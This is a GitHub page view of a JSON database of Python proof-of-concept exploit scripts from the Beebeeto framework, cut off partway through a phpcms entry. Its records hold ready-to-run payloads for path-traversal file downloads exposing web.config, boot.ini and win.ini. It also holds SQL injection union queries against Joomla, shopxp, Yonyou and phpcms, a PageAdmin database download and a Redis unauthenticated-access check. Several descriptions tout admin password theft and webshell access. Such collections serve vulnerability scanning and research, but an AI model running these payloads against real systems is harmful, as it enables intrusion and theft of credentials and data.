-
Notifications
You must be signed in to change notification settings - Fork 60
/
pocdb.json
184 lines (184 loc) · 599 KB
/
pocdb.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
{"create_date": "2015-10-08 13:54:05", "name": "Joomla /index.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "ximumu", "rank": 2, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Joomla,/index.php,com_jetext,Arbitrary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0142',\r\n 'name': 'Joomla /index.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'ximumu',\r\n 'create_date': '2015-10-05',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Joomla',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['Joomla', '/index.php', 'com_jetext', 'Arbitrary File Download'],\r\n 'desc': '''\r\n /index.php \u6587\u4ef6\u7528\u4e8e\u6587\u4ef6\u4e0b\u8f7d\uff0c/index.php?option=com_jetext&task=download&\r\n file=[../../index.php] \u5176\u4e2dfile\u53c2\u6570\u672a\u505a\u6b63\u786e\u8fc7\u6ee4\u9650\u5236,\u5bfc\u81f4\u53ef\u4e0b\u8f7d\u4efb\u610f\u6587\u4ef6\r\n ''',\r\n 'references': ['https://www.bugscan.net/#!/x/22738',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/index.php?option=com_jetext&task=download&file=../../index.php\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if 'Id: index.php' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "/index.php \u6587\u4ef6\u7528\u4e8e\u6587\u4ef6\u4e0b\u8f7d\uff0c/index.php?option=com_jetext&task=download&file=[../../index.php] \u5176\u4e2dfile\u53c2\u6570\u672a\u505a\u6b63\u786e\u8fc7\u6ee4\u9650\u5236,\u5bfc\u81f4\u53ef\u4e0b\u8f7d\u4efb\u610f\u6587\u4ef6", "app_name": "Joomla", "id": "poc-2015-0142", "layer4_protocol": null}
{"create_date": "2015-09-25 14:53:15", "name": "\u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf /prog/get_composer_att.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "warsong", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0141',\r\n 'name': '\u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf /prog/get_composer_att.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'warsong',\r\n 'create_date': '2015-09-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['\u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n \u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e\u5bfc\u81f4\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f\uff0c\u53ef\u81f4\u7cfb\u7edf\u6ca6\u9677\u3002\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-066892'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n verify_url = ('%s/prog/get_composer_att.php?att_size=1623&filenamepath'\r\n '=C:\\boot.ini&maxatt_sign=4bc882e8c4a98ac7a97acd321aad4f'\r\n '88&attach_filename=boot.ini') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and 'boot.ini' in req.content:\r\n if 'configuration' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e\u5bfc\u81f4\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f\uff0c\u53ef\u81f4\u7cfb\u7edf\u6ca6\u9677\u3002", "app_name": "Other", "id": "poc-2015-0141", "layer4_protocol": null}
{"create_date": "2015-09-21 11:07:47", "name": "shopxp 7.4 /textbox2.asp SQL Injection PoC", "level": "\u9ad8\u5371", "batchable": 1, "author": "cflq3", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "shopxp,sql\u6ce8\u5165\u6f0f\u6d1e,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n 'poc':{\r\n 'id':'poc-2015-0139',\r\n 'name':'shopxp 7.4 /textbox2.asp SQL Injection PoC',\r\n 'author':'cflq3',\r\n 'create_date':'2015-09-18',\r\n },\r\n 'protocol':{\r\n 'name':'http',\r\n 'port':[80],\r\n 'layer4_protocol':['tcp'],\r\n },\r\n 'vul':{\r\n 'app_name':'shopxp',\r\n 'vul_version':['7.4'],\r\n 'type':'SQL Injection',\r\n 'tag':['shopxp','sql\u6ce8\u5165\u6f0f\u6d1e','asp'],\r\n 'desc':'shopxp 7.4 textbox2.asp sql injection',\r\n 'references':['http://www.sebug.net/vuldb/ssvid-62319'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,MD5(1),4,5,6,7%20from%20shopxp_admin'\r\n verify_url = args['options']['target']+ payload\r\n if args['options']['verbose']:\r\n print '[*]Request URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n if req.getcode()==200:\r\n if 'c4ca4238a0b923820dcc509a6f75849b' in content:\r\n args['success']=True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit=verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "shopxp 7.4 textbox2.asp sql injection", "app_name": "Other", "id": "poc-2015-0139", "layer4_protocol": null}
{"create_date": "2015-09-14 14:31:39", "name": "Joomla /index.php com_memorix SQL \u6ce8\u5165\u6f0f\u6d1e PoC", "level": "\u4e2d\u5371", "batchable": 1, "author": "cflq3", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "joomla \u6f0f\u6d1e,com_memorix,sql injection", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info={\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0138',\r\n 'name': 'Joomla /index.php com_memorix SQL \u6ce8\u5165\u6f0f\u6d1e PoC',\r\n 'author': 'cflq3',\r\n 'create_date': '2015-09-12',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Joomla',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['joomla \u6f0f\u6d1e', 'com_memorix', 'sql injection'],\r\n 'desc': 'Joomla com_memorix component sql injection',\r\n 'references': ['https://www.exploit-db.com/exploits/37773/'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = ('/index.php?option=com_memorix&task=result&searchplugin=theme&'\r\n 'Itemid=60&ThemeID=-8594+union+select+111,222,MD5(1),444,555,66'\r\n '6,777,888,999--+AbuHassan')\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*]Request URL:' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n if 'c4ca4238a0b923820dcc509a6f75849b' in content:\r\n args['success']=True\r\n args['poc_ret']['vul_url']=args['options']['target']\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Joomla com_memorix component sql injection", "app_name": "Joomla", "id": "poc-2015-0138", "layer4_protocol": null}
{"create_date": "2015-09-10 13:26:25", "name": "PageAdmin v3.0 /e/database/v3.mdb \u6570\u636e\u5e93\u53d1\u73b0\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "warsong", "rank": 4, "port": null, "vul_type": "\u6570\u636e\u5e93\u53d1\u73b0", "tag": "PageAdmin v3.0 \u6570\u636e\u5e93\u4e0b\u8f7d\u6f0f\u6d1e POC,/e/database/v3.mdb,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0137',\r\n 'name': 'PageAdmin v3.0 /e/database/v3.mdb \u6570\u636e\u5e93\u53d1\u73b0\u6f0f\u6d1e POC',\r\n 'author': 'warsong',\r\n 'create_date': '2015-09-10',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PageAdmin',\r\n 'vul_version': ['v3.0'],\r\n 'type': 'Database Found',\r\n 'tag': ['PageAdmin v3.0 \u6570\u636e\u5e93\u4e0b\u8f7d\u6f0f\u6d1e POC', '/e/database/v3.mdb', 'asp'],\r\n 'desc': '''\r\n PageAdmin\u6570\u636e\u5e93\u4e0b\u8f7d\u6f0f\u6d1e \uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u3001\r\n \u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-061685'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n verify_url = ('%s/e/database/v3.mdb') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200:\r\n if 'configuration' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "PageAdmin\u6570\u636e\u5e93\u4e0b\u8f7d\u6f0f\u6d1e \uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u3001\u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...", "app_name": "PageAdmin", "id": "poc-2015-0137", "layer4_protocol": null}
{"create_date": "2015-08-31 13:05:02", "name": "\u7528\u53cb\u81f4\u8fdcA6\u534f\u540c\u7cfb\u7edf /isNotInTable.jsp SQL Injection PoC", "level": "\u9ad8\u5371", "batchable": 1, "author": "Sevsea", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u7528\u53cbSQL\u6ce8\u5165\u6f0f\u6d1e,/ext/trafaxserver/ExtnoManage/isNotInTable.jsp \u6f0f\u6d1e,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n 'poc':{\r\n 'id':'poc-2015-0133',\r\n 'name':'\u7528\u53cb\u81f4\u8fdcA6\u534f\u540c\u7cfb\u7edf /isNotInTable.jsp SQL Injection PoC',\r\n 'author':'Sevsea',\r\n 'create_date':'2015-08-27',\r\n },\r\n 'protocol':{\r\n 'name':'http',\r\n 'port':'80',\r\n 'layer4_protocol':['tcp'],\r\n },\r\n 'vul':{\r\n 'app_name':'\u7528\u53cb',\r\n 'vul_version':['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['\u7528\u53cbSQL\u6ce8\u5165\u6f0f\u6d1e', '/ext/trafaxserver/ExtnoManage/isNotInTable.jsp \u6f0f\u6d1e', 'jsp'],\r\n 'desc': '\u7528\u53cb mysql+jsp \u6ce8\u5c04',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-0110312'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls,args):\r\n url = args['options']['target']\r\n verify_url=('%s/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids='\r\n '(17) union all select md5(3.1415)#') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code != 404 and '63e1f04640e83605c1d177544a5a0488' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run(debug=True))", "desc": "\u7528\u53cb mysql+jsp \u6ce8\u5c04", "app_name": "\u7528\u53cb\uff08Yonyou\uff09", "id": "poc-2015-0133", "layer4_protocol": null}
{"create_date": "2015-08-25 14:12:02", "name": "SiteFactory CMS 5.5.9 \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e PoC", "level": "\u9ad8\u5371", "batchable": 1, "author": "ali", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "SiteFactory,Arbitrary File Download,sitefactory/assets/download.aspx?file=", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\nimport urllib2, urllib\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc':{\r\n 'id': 'poc-2015-0130',\r\n 'name': 'SiteFactory CMS 5.5.9 \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e PoC',\r\n 'author': 'ali',\r\n 'create_data': '2015-08-25',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'SiteFactory',\r\n 'vul_versiosn': ['5.5.9'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['SiteFactory', 'Arbitrary File Download', 'sitefactory/assets/download.aspx?file='],\r\n 'desc': 'SiteFactory CMS 5.5.9\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e',\r\n 'references': ['https://www.bugscan.net/#!/x/22441'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = ('/sitefactory/assets/download.aspx?file=c%3a\\windows\\win.ini')\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.urlopen(verify_url)\r\n statecode = urllib.urlopen(verify_url).getcode()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = req.read()\r\n if statecode == 200 and '[fonts]' in content and '[files]' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "SiteFactory CMS 5.5.9\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e", "app_name": "Other", "id": "poc-2015-0130", "layer4_protocol": null}
{"create_date": "2015-08-18 16:09:02", "name": "\u4e07\u6237ezeip /download.ashx \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "warsong", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "\u4e07\u6237\u6f0f\u6d1e,/download.ashx\u6f0f\u6d1e,aspx", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0129',\r\n 'name': '\u4e07\u6237ezeip /download.ashx \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'warsong',\r\n 'create_date': '2015-08-17',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ezeip',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['\u4e07\u6237\u6f0f\u6d1e', '/download.ashx\u6f0f\u6d1e', 'aspx'],\r\n 'desc': '''\r\n \u4e07\u6237ezeip\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\r\n \u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-057764'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n verify_url = ('%s/download.ashx?files=../web.config') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and '<?xml version=' in req.content:\r\n if 'configuration' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u4e07\u6237ezeip\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...", "app_name": "\u4e07\u6237", "id": "poc-2015-0129", "layer4_protocol": null}
{"create_date": "2015-08-11 14:01:08", "name": "Redis \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "stefan", "rank": 3, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Redis\u8fdc\u7a0b\u8fde\u63a5\u53ef\u5199shell\u6f0f\u6d1e,\u9ed8\u8ba4\u7a7a\u53e3\u4ee4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e,6379\u7aef\u53e3", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport redis\r\nimport string\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http.http import transform_target_ip\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0128',\r\n 'name': 'Redis \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC',\r\n 'author': 'stefan',\r\n 'create_date': '2015-08-07',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'Redis',\r\n 'port': [6379],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Redis',\r\n 'vul_version': ['*'],\r\n 'type': 'Other',\r\n 'tag': ['Redis\u8fdc\u7a0b\u8fde\u63a5\u53ef\u5199shell\u6f0f\u6d1e', '\u9ed8\u8ba4\u7a7a\u53e3\u4ee4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e', '6379\u7aef\u53e3'],\r\n 'desc': '''\r\n Redis\u9ed8\u8ba4\u5b89\u88c5\u540e\u65e0\u9700\u53e3\u4ee4\u53ef\u8fdc\u7a0b\u8fde\u63a5\uff0c\u5e76\u4e14\u53ef\u4ee5\u4f7f\u7528redis\u547d\u4ee4\u66f4\u6539\u5199\u5165\u6587\u4ef6\u7684\u76ee\u5f55\u53ca\u7c7b\u578b\uff0c\r\n \u4ece\u800c\u5bfc\u81f4\u4e00\u7cfb\u5217\u5b89\u5168\u95ee\u9898\u3002\r\n ''',\r\n 'references': ['http://www.secpulse.com/archives/5357.html',\r\n ],\r\n },\r\n }\r\n\r\n def _init_user_parser(self):\r\n self.user_parser.add_option('-p','--port',\r\n action='store', dest='port', type='int', default=6379,\r\n help='this poc need the port to connect redis'\r\n 'the default port is 6379.')\r\n @classmethod\r\n def verify(cls, args):\r\n ip_addr = transform_target_ip(args['options']['target'])\r\n p = args['options']['port']\r\n if args['options']['verbose']:\r\n print '[*] Connect Redis: redis-cli -h ' + ip_addr + ' -p' + str(p)\r\n try:\r\n r = redis.Redis(host=ip_addr, port=p, db=0)\r\n ret1 = r.set('name','stefan')\r\n ret2 = r.get('name')\r\n if ret1 & (ret2 in 'stefan'):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = ip_addr + ':' + str(p)\r\n except Exception, e:\r\n if args['options']['verbose']:\r\n print str(e)\r\n args['success'] = False\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Redis\u9ed8\u8ba4\u5b89\u88c5\u540e\u65e0\u9700\u53e3\u4ee4\u53ef\u8fdc\u7a0b\u8fde\u63a5\uff0c\u5e76\u4e14\u53ef\u4ee5\u4f7f\u7528redis\u547d\u4ee4\u66f4\u6539\u5199\u5165\u6587\u4ef6\u7684\u76ee\u5f55\u53ca\u7c7b\u578b\uff0c\u4ece\u800c\u5bfc\u81f4\u4e00\u7cfb\u5217\u5b89\u5168\u95ee\u9898\u3002", "app_name": "Redis", "id": "poc-2015-0128", "layer4_protocol": null}
{"create_date": "2015-08-10 15:06:14", "name": "phpcms v9 User login /index.php SQL injection POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "ali", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "phpcms v9\u6f0f\u6d1e,sql injection,/index.php?m=menber&c=index&a=login", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc':{\r\n 'id': 'poc-2015-0127',\r\n 'name': 'phpcms v9 User login /index.php SQL injection POC',\r\n 'author': 'ali',\r\n 'create_date': '2015-08-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpcms',\r\n 'vul_versiosn': ['v9'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['phpcms v9\u6f0f\u6d1e', 'sql injection', '/index.php?m=menber&c=index&a=login'],\r\n 'desc': 'phpcms v9\u7528\u6237\u767b\u5f55\u5904\u5b58\u5728sql\u6ce8\u5165\u6f0f\u6d1e',\r\n 'references': ['http://0day5.com/archives/3266'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = 